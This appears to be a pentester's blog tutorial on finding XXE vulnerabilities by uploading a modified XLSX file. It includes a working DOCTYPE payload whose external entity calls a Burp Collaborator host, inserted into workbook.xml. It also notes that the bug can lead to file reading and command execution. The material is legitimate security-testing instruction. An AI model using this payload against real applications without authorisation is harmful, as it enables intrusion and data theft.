Xxe spreadsheet exploitation . XLSX

The vulnerability of XML External Entity (XXE) is that when parsing an XML document structure called Document Type Definition (DTD), you are allowed to define your own XML entities. Depending on the server-side XML processing engine and the configuration of the environment, this type of vulnerability can be exploited differently. Starting with listing directories on the system, reading application and system files, obtaining an encrypted password of the application user, as well as transferring files to the server or executing system commands.

The classic scenario of this type of vulnerability assumes that we are dealing with a request containing in our body xml to which we add the part responsible, for the definitions of our own entity. This vulnerability, however, can also occur when dealing with an application that somehow processes Excel files. XLSX , Word . DOCX or PowerPoint . PPTX. We owe it to the fact that these types of files that are OOXML-compliant, thus they are simply packed several files. XML.

The quick attack scenario is as follows:

  1. Create a new blank document . XLSX. It can use the “Google Sheet” for this purpose.
google sheet

2. Open Burp Suite Professional -> Burp -> Burp Collaborator Client . Then click the “Copy to clipboard” button. In my case, the server address was as follows – lpexqn6l2qamcw74mgerllgpzg56tv.burpcollaborator.net.

Alternatively, if you have an external IP, you can use a simple HTTP server in python – “python3 -m http.server 8080”.

3. Open the downloaded file with 7zip.

xlxs edition

3. Edit the “workbook.xml” file in the “xl” directory by adding the following code (of course, replacing the server address with your own):

<!DOCTYPE root [ <!ENTITY % xxe SYSTEM "http://lpexqn6l2qamcw74mgerllgpzg56tv.burpcollaborator.net/"> %xxe; ]>

NOTE- In one of the applications I tested, the vulnerability xxe revealed after editing “[Content_Types].xml”, so it’s worth checking this file.

workbook edition.xml
workbook edition.xml

4. Save your changes and upload the file in the app you’re testing.

5. Now check the Collaborator client for any requests:

burp collaborator client

6. Enjoy the 🙂 – you have just confirmed xxe vulnerability in the tested application and you can proceed to further its use.

A common security feature against XXE is to completely disable the loading of external entities in an XML parser.

Chcesz wiedzieć więcej?

Zapisz się i bądź informowany o nowych postach (zero spamu!). Dodatkowo otrzymasz, moją prywatną listę 15 najbardziej przydatnych narzędzi (wraz z krótkim opisem), których używam przy testach penetracyjnych.

Nigdy nie podam, nie wymienię ani nie sprzedam Twojego adresu e-mail. W każdej chwili możesz zrezygnować z subskrypcji.

Bookmark the permalink.

Share your opinion about the article.